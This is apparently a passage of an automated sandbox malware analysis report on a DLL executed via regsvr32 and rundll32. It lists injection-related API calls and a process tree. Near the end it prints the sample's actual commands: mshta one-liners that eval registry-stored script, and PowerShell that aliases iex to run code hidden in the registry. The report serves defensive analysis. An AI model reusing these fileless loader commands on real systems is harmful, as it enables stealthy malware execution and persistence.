            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_031F80D03_2_031F80D0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BD2CB83_2_04BD2CB8
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BE0CB23_2_04BE0CB2
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BDF4D03_2_04BDF4D0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BE14183_2_04BE1418
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BE1D923_2_04BE1D92
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BE1DEA3_2_04BE1DEA
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BC2D253_2_04BC2D25
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BCF6413_2_04BCF641
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BC68B23_2_04BC68B2
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BE01A53_2_04BE01A5
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BD39243_2_04BD3924
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BE73583_2_04BE7358
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_01120DF74_2_01120DF7
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_01120DF94_2_01120DF9
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05EC1DEA4_2_05EC1DEA
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05EA2D254_2_05EA2D25
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05EBF4D04_2_05EBF4D0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05EB2CB84_2_05EB2CB8
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05EC0CB24_2_05EC0CB2
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05EAF6414_2_05EAF641
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05EC01A54_2_05EC01A5
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05EB39244_2_05EB3924
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05EA68B24_2_05EA68B2
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0105436E5_2_0105436E
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_01054BB35_2_01054BB3
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_010580D05_2_010580D0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00EB0DF95_2_00EB0DF9
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00EB0DF75_2_00EB0DF7
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_05112D255_2_05112D25
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_05131D925_2_05131D92
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_05131DEA5_2_05131DEA
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_051314185_2_05131418
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_05130CB25_2_05130CB2
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_05122CB85_2_05122CB8
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0512F4D05_2_0512F4D0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0511F6415_2_0511F641
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_051239245_2_05123924
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_051301A55_2_051301A5
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_051168B25_2_051168B2
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_051373585_2_05137358
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046D9499 CreateProcessAsUserW,1_2_046D9499
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_01C12F8D GetProcAddress,NtCreateSection,memset,1_2_01C12F8D
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_01C1373D NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,1_2_01C1373D
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_01C14AAF NtMapViewOfSection,1_2_01C14AAF
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_01C182F5 NtQueryVirtualMemory,1_2_01C182F5
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00DC0880 NtAllocateVirtualMemory,1_2_00DC0880
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00DC0AB8 NtProtectVirtualMemory,1_2_00DC0AB8
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046CB45A NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,1_2_046CB45A
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046CD4F4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,1_2_046CD4F4
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046CE4DC GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,1_2_046CE4DC
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046D70AC NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,1_2_046D70AC
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046D4560 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,1_2_046D4560
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046E3E7D NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,1_2_046E3E7D
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046DD6E3 NtQueryInformationProcess,1_2_046DD6E3
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046DBEBC GetProcAddress,NtCreateSection,memset,1_2_046DBEBC
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046C6F70 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,1_2_046C6F70
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046D0FE0 NtMapViewOfSection,1_2_046D0FE0
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046CA7FE memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset,1_2_046CA7FE
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046CAFD1 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,1_2_046CAFD1
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046CECE9 NtGetContextThread,RtlNtStatusToDosError,1_2_046CECE9
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046DF0CC memset,NtQueryInformationProcess,1_2_046DF0CC
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046C1D70 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,1_2_046C1D70
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046D595B NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,1_2_046D595B
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046DA1FC NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,1_2_046DA1FC
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046E2588 NtQuerySystemInformation,RtlNtStatusToDosError,1_2_046E2588
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046C3EBE NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,1_2_046C3EBE
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046D630F memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,1_2_046D630F
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_031F373D NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,3_2_031F373D
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_031F2F8D GetProcAddress,NtCreateSection,memset,3_2_031F2F8D
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_031F4AAF NtMapViewOfSection,3_2_031F4AAF
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_031F82F5 NtQueryVirtualMemory,3_2_031F82F5
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BCD4F4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,3_2_04BCD4F4
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BCE4DC GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,3_2_04BCE4DC
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BCB45A NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,3_2_04BCB45A
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BD4560 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,3_2_04BD4560
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BDBEBC GetProcAddress,NtCreateSection,memset,3_2_04BDBEBC
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BDD6E3 NtQueryInformationProcess,3_2_04BDD6E3
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BE3E7D NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,3_2_04BE3E7D
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BCA7FE memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset,3_2_04BCA7FE
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BD0FE0 NtMapViewOfSection,3_2_04BD0FE0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BCAFD1 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,3_2_04BCAFD1
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BC6F70 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,3_2_04BC6F70
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BD70AC NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,3_2_04BD70AC
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BCECE9 NtGetContextThread,RtlNtStatusToDosError,3_2_04BCECE9
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BE2588 NtQuerySystemInformation,RtlNtStatusToDosError,3_2_04BE2588
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BC1D70 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,3_2_04BC1D70
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BC3EBE NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,3_2_04BC3EBE
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BDF0CC memset,NtQueryInformationProcess,3_2_04BDF0CC
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BDA1FC NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,3_2_04BDA1FC
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BD595B NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,3_2_04BD595B
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BD630F memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,3_2_04BD630F
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_01120880 NtAllocateVirtualMemory,4_2_01120880
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_01120AB8 NtProtectVirtualMemory,4_2_01120AB8
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_05EB4560 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,4_2_05EB4560
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_05EAD4F4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,4_2_05EAD4F4
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_05EAE4DC GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,4_2_05EAE4DC
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_05EAB45A NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,4_2_05EAB45A
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_05EAAFD1 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,4_2_05EAAFD1
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_05EA6F70 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,4_2_05EA6F70
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_05EBD6E3 NtQueryInformationProcess,4_2_05EBD6E3
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_05EC2588 NtQuerySystemInformation,RtlNtStatusToDosError,4_2_05EC2588
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_05EA1D70 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,4_2_05EA1D70
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_05EAECE9 NtGetContextThread,RtlNtStatusToDosError,4_2_05EAECE9
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_05EA3EBE NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,4_2_05EA3EBE
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_05EC3E7D NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,4_2_05EC3E7D
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_05EBA1FC NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,4_2_05EBA1FC
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_05EB595B NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,4_2_05EB595B
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_05EBF0CC memset,NtQueryInformationProcess,4_2_05EBF0CC
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_05EB70AC NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,4_2_05EB70AC
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_05EB630F memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,4_2_05EB630F
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0105373D NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,5_2_0105373D
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_01052F8D GetProcAddress,NtCreateSection,memset,5_2_01052F8D
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_01054AAF NtMapViewOfSection,5_2_01054AAF
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_010582F5 NtQueryVirtualMemory,5_2_010582F5
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_00EB0AB8 NtProtectVirtualMemory,5_2_00EB0AB8
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_00EB0880 NtAllocateVirtualMemory,5_2_00EB0880
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_05124560 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,5_2_05124560
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0511B45A NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,5_2_0511B45A
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0511E4DC GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,5_2_0511E4DC
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0511D4F4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,5_2_0511D4F4
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_05116F70 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,5_2_05116F70
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0511AFD1 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,5_2_0511AFD1
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0512D6E3 NtQueryInformationProcess,5_2_0512D6E3
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_05111D70 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,5_2_05111D70
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_05132588 NtQuerySystemInformation,RtlNtStatusToDosError,5_2_05132588
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0511ECE9 NtGetContextThread,RtlNtStatusToDosError,5_2_0511ECE9
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_05133E7D NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,5_2_05133E7D
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_05113EBE NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,5_2_05113EBE
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0512595B NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,5_2_0512595B
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0512A1FC NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,5_2_0512A1FC
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_051270AC NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,5_2_051270AC
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0512F0CC memset,NtQueryInformationProcess,5_2_0512F0CC
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0512630F memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,5_2_0512630F
            Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc.dll
            Source: 61f113091fd0c.dll | Static PE information: invalid certificate
            Source: 61f113091fd0c.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\61f113091fd0c.dll"
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\61f113091fd0c.dll",#1
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\61f113091fd0c.dll
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\61f113091fd0c.dll",#1
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\61f113091fd0c.dll,DllRegisterServer
            Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Tm45='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Tm45).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
            Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Sr9b='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Sr9b).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
            Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Agjk='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Agjk).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Eote='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Eote).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name gpcceqbj -value gp; new-alias -name qlrwbeixf -value iex; qlrwbeixf ([System.Text.Encoding]::ASCII.GetString((gpcceqbj "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sjfy431f.cmdline
            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oyq1c2cj.cmdline
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEEEB.tmp" "c:\Users\user\AppData\Local\Temp\CSCA98C8C663682422BB3F042EAAC3AA5FC.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF563.tmp" "c:\Users\user\AppData\Local\Temp\CSC8BAF1FC523B466D86EA8211DF896A.TMP"
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ugg3o5nf.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tpt0a0ul.cmdline
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEA8.tmp" "c:\Users\user\AppData\Local\Temp\CSC38F7C9333840429F8E926B6BB254946E.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES105D.tmp" "c:\Users\user\AppData\Local\Temp\CSC2A73DB97C702412EB695E62356797BBE.TMP"
            Source: C:\Windows\System32\control.exe | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hsihch1.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oeprcmty.cmdline
